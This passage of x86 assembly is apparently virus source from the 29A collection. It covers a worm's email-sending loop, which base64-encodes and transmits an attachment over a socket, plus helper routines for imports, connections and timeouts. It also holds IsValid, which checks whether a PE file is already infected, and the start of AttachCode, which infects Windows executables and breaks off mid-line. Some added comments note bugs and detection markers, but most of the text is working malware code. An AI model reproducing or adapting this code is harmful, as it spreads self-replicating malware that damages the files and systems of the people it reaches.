
📄 29a-7.013

📁 从29A上收集的病毒源码
    push    edx
    push    ecx    

    ; read 3 bytes
    push    0
    pushptr dwNumberOfBytes
    push    3
    pushptr threeBytes
    pushval hFile
    ApiCall ReadFile   
   
    ; base64 encode the three bytes
    mov     ecx, 3
    lea     esi, [ebp+threeBytes]
    lea     edi, [ebp+fourBytes]
    call    Base64Encode

    ; send the four base64 encoded bytes
    push    0
    push    4
    pushptr fourBytes
    pushval hSock
    ApiCall send
    cmp     eax, -1
    je      exitThread    

    pop     ecx
    pop     edx
    loop    sendAttachment    

    ; get the remaining bytes
    push    edx
    push    0
    pushptr dwNumberOfBytes
    push    edx
    pushptr threeBytes
    pushval hFile
    ApiCall ReadFile
    pop     edx

    ; base64 encode the remaining bytes
    push    edx
    mov     ecx, edx
    lea     esi, [ebp+threeBytes]
    lea     edi, [ebp+fourBytes]
    call    Base64Encode       
    pop     edx

    ; send the remaining bytes
    push    0
    push    4
    pushptr fourBytes
    pushval hSock
    ApiCall send
    cmp     eax, -1
    je      exitThread        

;-------------------------------------------------------------------------------------------------;
; send the final part of the email message.                                                       ;
;-------------------------------------------------------------------------------------------------;

    ; send the last part of the email message
    pushptr szEmailPart17
    ApiCall lstrlenA
    push    0
    push    eax
    pushptr szEmailPart17
    pushval hSock
    ApiCall send
    cmp     eax, -1
    je      exitThread    

    ; recieve the server response
    push    0
    push    256      
    pushptr szResponse   
    pushval hSock       
    ApiCall recv
    cmp     eax, -1
    je      exitThread

;-------------------------------------------------------------------------------------------------;
; Clean up
;-------------------------------------------------------------------------------------------------;

    ; free the webpage buffer
    pushptr lpWebpage
    ApiCall GlobalFree

    ; free the email message buffer
    pushptr lpEmailMessage
    ApiCall GlobalFree

    ; close wininet
    pushval hInternet
    ApiCall InternetCloseHandle  

    ; close winsock
    ApiCall WSACleanup 
        
;-------------------------------------------------------------------------------------------------;
; Exit thread.                                                                                    ;
;-------------------------------------------------------------------------------------------------;

exitThread:  

    ; set the thread status
    mov     [ebp+dwThreadStatus], EXIT_THREAD
   
    ; exit the thread
    ApiCall GetCurrentThread
    
    lea     ebx, [ebp+dwExitCode]    
    push    ebx
    push    eax
    ApiCall GetExitCodeThread
       
    pushval dwExitCode
    ApiCall ExitThread              

;-------------------------------------------------------------------------------------------------;
; Function(s)                                                                                     ;
;-------------------------------------------------------------------------------------------------;

Base64Encode    PROC
    ;
    ; Description:
    ;   Base64 encodes a group of bytes.
    ;   Whole 3-byte groups are emitted as 4 alphabet characters each; the
    ;   remainder (0..2 bytes) is handled by the @@pad path below.
    ;
    ; Parameters:
    ;   ecx = Number of bytes to encode.
    ;   esi = pointer to a buffer that needs encoding.
    ;   edi = pointer to a buffer that will receive the encoded data.
    ;
    ; Return Values:
    ;   None.
    ;
    ; Clobbers:
    ;   eax, ebx, ecx, edx, esi, edi, flags (ebx is used as the divisor).
    ;   ebp is read as the base for @@charset and must hold the same delta
    ;   the callers use for their ebp-relative locals.
    ;
    ; Notes (analysis):
    ;   - Each full group is loaded with lodsd, i.e. 4 bytes are read from
    ;     esi although only 3 belong to the group; the input buffer must be
    ;     readable one byte past the data. DF is assumed clear.
    ;   - After the full groups the @@pad path is always entered (edx is
    ;     0..2 here, so 'jg @@return' is never taken); it writes '====' at
    ;     edi and then emits (remainder + 1) characters, so the output buffer
    ;     is written past the 4*(count/3) bytes produced by the full groups.
    ;   - The alphabet at @@charset is the standard base64 alphabet, stored
    ;     inline in the code and addressed through ebp.
    ;
    cmp     ecx, 3
    jl      @@pad                                  ; no groups of 3 to convert?
    xor     edx, edx
    mov     eax, ecx
    mov     ebx, 3
    div     ebx                                    ; eax = number of 3-byte groups, edx = number of padded bytes (0..2)
    mov     ecx, eax    
@@base64:                                          ; encode groups of 3 bytes to base64
    lodsd                                          ; load 4 bytes; only the low 3 belong to this group
    dec     esi                                    ; step back one: net advance of 3 bytes
    bswap   eax                                    ; first input byte becomes the most significant
    push    ecx
    mov     ecx, 4                                 ; 4 output characters per group
@@encode3:
    rol     eax, 6                                 ; rotate the next 6-bit sextet into the low bits
    push    eax        
    and     eax, 3fh
    mov     al, [ebp+@@charset+eax]                ; get the base64 character
    stosb
    pop     eax 
    loop    @@encode3    
    pop     ecx
    loop    @@base64
    mov     ecx, edx                               ; ecx = remaining bytes (0..2)
    cmp     edx, 3
    jg      @@return                               ; never taken: the remainder of a division by 3 is below 3
@@pad:                                             ; pad any additional bytes
    inc     ecx                                    ; emit remainder+1 characters
    mov     dword ptr [edi], '===='                ; pre-fill 4 bytes with padding; stosb below overwrites the first ecx of them
    mov     eax, [esi]                             ; reads 4 bytes regardless of how many remain
    bswap   eax
@@l1: 
    rol     eax, 6
    push    eax
    and     eax, 3fh
    mov     al, [ebp+@@charset+eax]
    stosb
    pop     eax
    loop    @@l1     
@@return:
    ret
@@charset   DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', 0   ; standard alphabet, kept inline in the code
Base64Encode    ENDP
        
SetTimeOut  PROC   
    ;
    ; Description:
    ;   Sets the timeout duration for sending and receiving data.
    ;   Stores eax at [edi] and hands that DWORD to setsockopt twice,
    ;   for SO_RCVTIMEO and SO_SNDTIMEO at SOL_SOCKET level (optlen 4).
    ;
    ; Parameters:
    ;   esi = socket handle.
    ;   edi = pointer to a DWORD.
    ;   eax = timeout duration.
    ;
    ; Return Values:
    ;   None. The result of setsockopt is not examined, so a failed call
    ;   leaves the socket blocking indefinitely with no indication.
    ;
    ; Clobbers:
    ;   Nothing by this code itself besides [edi] and flags; ApiCall is a
    ;   macro defined elsewhere and presumably leaves eax (and possibly
    ;   ecx/edx) changed after each call — not verifiable from this excerpt.
    ;

    ; set the timeout duration
    mov      [edi], eax                            ; [edi] is the optval buffer both calls read
  
    ; set the timeout for receiving data 
    push     4                                     ; optlen
    push     edi                                   ; optval
    push     SO_RCVTIMEO                           ; optname
    push     SOL_SOCKET                            ; level
    push     esi                                   ; s
    ApiCall  setsockopt
  
    ; set the timeout for sending data
    push     4
    push     edi
    push     SO_SNDTIMEO
    push     SOL_SOCKET
    push     esi
    ApiCall  setsockopt
  
    ret
SetTimeOut  ENDP

LoadImports     PROC
    ;
    ; Description:
    ;   Loads a series of dll's and the addresses of the specified functions.
    ;   The table is walked in place: an entry is a NUL-terminated dll name
    ;   followed by NUL-terminated function names, each of which is followed
    ;   by a 4-byte slot that receives the resolved address. A NUL byte after
    ;   the last function name ends that dll's list; a '$' byte after it ends
    ;   the whole table, otherwise the next dll name follows.
    ;
    ; Parameters:
    ;   eax = pointer to an import table.
    ;
    ; Return Values:
    ;   If the function is successful the return value is 0. If the function fails 
    ;   the return value is -1.
    ;
    ; Clobbers:
    ;   eax, ebx, ecx, esi, edi, flags (plus whatever ApiCall clobbers).
    ;   On success edi points one past the '$' terminator.
    ;
    ; Notes (analysis):
    ;   - Resolved addresses are written back into the table itself, so the
    ;     table must live in writable memory; dll and function names sit in
    ;     it as plain strings, which exposes the full API list to static
    ;     inspection of the body.
    ;   - Each 'repne scasb' stops after at most 100 bytes; if no NUL is found
    ;     within that range the scan simply ends there and the code continues
    ;     with edi 100 bytes further on. DF is assumed clear.
    ;   - The failure branches jump to 'apiLoadError' (no '@@' prefix). Whether
    ;     that resolves to the local '@@apiLoadError' below or to a label
    ;     elsewhere in the file cannot be told from this excerpt.
    ;
    mov     edi, eax                               ; edi = cursor into the import table
@@loadLibrary:
    push    edi
    ApiCall LoadLibraryA                           ; load the dll (NUL-terminated name at edi)
    cmp     eax, 0
    je      apiLoadError                           ; NULL module handle -> fail
    mov     esi, eax                               ; esi = module handle for the GetProcAddress calls
    xor     al, al
    mov     ecx, 100
    repne   scasb                                  ; find the dll pointer: advance edi past the name's NUL
@@loadFunctions:    
    push    edi
    push    esi
    ApiCall GetProcAddress                         ; get function address: GetProcAddress(esi, name at edi)
    cmp     eax, 0
    je      apiLoadError   
    mov     ebx, eax                               ; keep the address; eax/ecx are reused by the scan below
    xor     al, al
    mov     ecx, 100
    repne   scasb                                  ; find function pointer: advance edi past the name's NUL
    mov     [edi], ebx                             ; save the function address into the 4-byte slot after the name
    add     edi, 4
    cmp     byte ptr [edi], 0                      ; end of function list?
    jne     @@loadFunctions
    inc     edi
    cmp     byte ptr [edi], '$'                    ; end of import list?
    jne     @@loadLibrary
    xor     eax, eax                               ; success
    ret
@@apiLoadError:
    mov     eax, -1
    ret
LoadImports     ENDP

ConnectToHost   PROC
    ;
    ; Description:
    ;   Connects to a host: resolves the name with gethostbyname, fills the
    ;   ebp-relative sockAddress (AF_INET, port, first resolved address),
    ;   creates a SOCK_STREAM socket and connects it.
    ;
    ; Parameters:
    ;   eax = port.
    ;   esi = pointer to a zero terminated host name.
    ;
    ; Return Values:
    ;   If the function is successful the return value is the socket handle. If the function fails 
    ;   the return value is -1.
    ;
    ; Clobbers:
    ;   eax, esi, flags, sockAddress (plus whatever ApiCall clobbers).
    ;
    ; Notes (analysis):
    ;   - When connect fails the socket created just before it is not closed,
    ;     so every failed attempt leaks one socket handle.
    ;   - gethostbyname (NULL), socket (-1) and connect (non-zero) failures all
    ;     collapse to -1; the caller cannot tell them apart.
    ;

    ; fill the SOCK_ADDRESS structure
    mov     [ebp+sockAddress.sin_family], AF_INET
    push    eax   
    ApiCall htons                                  ; htons(port)
    mov     [ebp+sockAddress.sin_port], ax         ; port in network byte order
    push    esi
    ApiCall gethostbyname                          ; gethostbyname(host)
    cmp     eax, 0
    je      @@connectionFailed                     ; NULL hostent -> fail
    mov     eax, [eax+12]                          ; hostent.h_addr_list (offset 12 in the 32-bit Winsock layout)
    mov     eax, [eax]                             ; first address entry
    mov     eax, [eax]                             ; the 32-bit IPv4 address itself
    mov     [ebp+sockAddress.sin_addr], eax

    ; Create a socket 
    push    PCL_NONE                               ; protocol (project constant; presumably 0 = default)
    push    SOCK_STREAM                 
    push    AF_INET          
    ApiCall socket
    mov     esi, eax                               ; esi = socket; the host name pointer is no longer needed
    cmp     eax, -1
    je      @@connectionFailed                     ; INVALID_SOCKET

    ; connect to host
    push    16                                     ; sizeof(sockaddr_in)
    pushptr sockAddress
    push    esi
    ApiCall connect
    cmp     eax, 0
    jne     @@connectionFailed                     ; connect returns 0 on success
    mov     eax, esi
    ret

@@connectionFailed:
    mov     eax, -1
    ret
ConnectToHost   ENDP       

IsValid     PROC
    ;
    ; Description:
    ;   Checks to see if the file is a valid win32 exe and is not already infected.
    ;   Sequence: open the file, read the DOS header and test for 'MZ', seek to
    ;   the PE header and test for 'PE', compute the file offset of the last
    ;   section header, read it and compare its Characteristics with
    ;   SECTION_RWE, which this program uses as its "already attached" marker.
    ;
    ; Parameters:
    ;   esi = Pointer to filename.
    ;
    ; Return Values:
    ;   If the function is successful the return value is 0. If the function fails the return
    ;   value is -1.
    ;
    ; Clobbers:
    ;   eax, ebx, edx, flags; writes hFile, dwNumberOfBytes, dosHeader, peHeader,
    ;   sectionHeader and lpLastSectionHeader in the ebp-relative frame
    ;   (plus whatever ApiCall clobbers).
    ;
    ; Notes (analysis / detection):
    ;   - The file is opened with GENERIC_WRITE OR GENERIC_READ and both share
    ;     modes even though this routine only reads; a process opening other
    ;     executables for write access while scanning is itself observable.
    ;   - The "already infected" test is an exact equality of the last section
    ;     header's dwCharacteristics with SECTION_RWE, so that value on the last
    ;     section is the marker to look for in files touched by this program.
    ;   - ReadFile and SetFilePointer results are not checked; a short read
    ;     leaves stale data in the header buffers and the tests run on it anyway.
    ;   - If CreateFileA fails, @@notValid still calls CloseHandle on whatever
    ;     hFile held before (hFile is only assigned on success).
    ;   - The last-section offset assumes 'size PE_HEADER' spans the signature,
    ;     file header and optional header so the section table starts right
    ;     after it — TODO confirm against the PE_HEADER struct definition.
    ;

    ; open the file
    push    0                                      ; hTemplateFile
    push    0                                      ; dwFlagsAndAttributes
    push    OPEN_EXISTING
    push    0                                      ; lpSecurityAttributes
    push    FILE_SHARE_WRITE OR FILE_SHARE_READ
    push    GENERIC_WRITE OR GENERIC_READ          ; write access requested although only reads follow
    push    esi
    ApiCall CreateFileA
    cmp     eax, -1                                ; INVALID_HANDLE_VALUE
    je      @@notValid 
    mov     [ebp+hFile], eax

    ; read the DOS header into memory
    push    0
    pushptr dwNumberOfBytes
    push    size DOS_HEADER
    pushptr dosHeader
    pushval hFile
    ApiCall ReadFile   
    cmp     word ptr [ebp+dosHeader.wSignature], 'ZM'   ; 'ZM' as a word immediate is "MZ" in memory order
    jne     @@notValid

    ; seek to the PE header
    push    FILE_BEGIN
    push    0
    pushval dosHeader.lpPEHeader                   ; presumably e_lfanew
    pushval hFile
    ApiCall SetFilePointer         

    ; read the PE header into memory
    push    0
    pushptr dwNumberOfBytes
    push    size PE_HEADER
    pushptr peHeader
    pushval hFile
    ApiCall ReadFile                
    
    ; is it a win32 exe file?
    cmp     word ptr [ebp+peHeader.dwSignature], 'EP'   ; "PE" in memory order; only the first 2 of the 4 signature bytes are tested
    jne     @@notValid

    ; calculate the location of the last section header:
    ;   (wNumberOfSections - 1) * size SECTION_HEADER + lpPEHeader + size PE_HEADER
    xor     edx, edx
    xor     eax, eax
    mov     ax, [ebp+peHeader.wNumberOfSections]   ; zero-extended 16-bit count (eax cleared above)
    dec     eax
    mov     ebx, size SECTION_HEADER
    mul     ebx                                    ; edx:eax = (count-1) * sizeof(section header)
    add     eax, [ebp+dosHeader.lpPEHeader]
    add     eax, size PE_HEADER
    mov     [ebp+lpLastSectionHeader], eax

    ; seek to the last section header
    push    FILE_BEGIN
    push    0
    pushval lpLastSectionHeader
    pushval hFile
    ApiCall SetFilePointer             
    
    ; read the last section header into memory
    push    0
    pushptr dwNumberOfBytes
    push    size SECTION_HEADER
    pushptr sectionHeader
    pushval hFile
    ApiCall ReadFile               

    ; code already attached?  (exact match against the marker value, not a flag test)
    cmp     dword ptr [ebp+sectionHeader.dwCharacteristics], SECTION_RWE
    je      @@notValid
    
@@isValid:
    pushval hFile
    ApiCall CloseHandle    
    xor     eax, eax                               ; 0 = valid target
    ret        
    
@@notValid:
    pushval hFile                                  ; may be a stale handle if CreateFileA failed above
    ApiCall CloseHandle
    mov     eax, -1
    ret
 
IsValid     ENDP

AttachCode  PROC
    ;
    ; Description:
    ;   Infects a win32 exe with this program.
    ;
    ; Parameters:
    ;   esi = Pointer to filename.
    ;
    ; Return Values:
    ;   If the function is successful the return value is 0. If the function fails the return
    ;   value is -1.
    ;
    
    ; save the return address for this instance    
    push    [ebp+lpReturnAddress]

    ; open the file
    push    0
    push    0
    push    OPEN_EXISTING
    push    0
    push    FILE_SH
